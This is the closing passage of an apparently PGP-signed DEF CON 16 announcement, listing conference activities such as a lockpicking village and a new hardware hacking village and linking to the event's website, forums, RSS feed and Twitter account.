And let's not forget the Gringo Challenge, DEF CON B0TS, Lockpick village, a
new Hardware Hacking Village, and more. Check it all out at:

DEFCON Website:
https://www.defcon.org/

Forums and Blogs
https://forum.defcon.org/

Follow the RSS feed:
https://www.defcon.org/defconrss.xml

Follow the announcements before, during, and after with twitter:
http://www.twitter.com/defcon16


-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.7.0 (Build 1012)
Charset: us-ascii

wsBVAwUBSESGHw6+AoIwjTCUAQjPXQf/Yqbb2kbmJMuwnh1sJXt0S/jFDAA5f2H2
MxzguQRKWlljBwmivMXACjYzibryK0Nb6GnpsS7OAtJWZupxSeVZ5DfXkJldaLPQ
CS6EqmfB8nStg74/PIlB3jhiCUOYcrDdd9+9K2HdN1dD44bNU4ZL6BS2aChpTm4y
RowRHBpv0BQFyi1UWpDXbGmQ99Ccinis/YDQNjGgKadcbTTD8ZQkgT++L82jrpef
9eOyYkRg8gOkuMgngx2ZASi/iRaodRA+2MZl4/SVDbm+tCjaQbRYjdaQh0NrJEM/
JssYWbYVOzuixtOV5nfn+k8nZ+08rTRv/TrAO2XegQKhJrQoaQjT+g==
=n5kj
-END PGP SIGNATURE-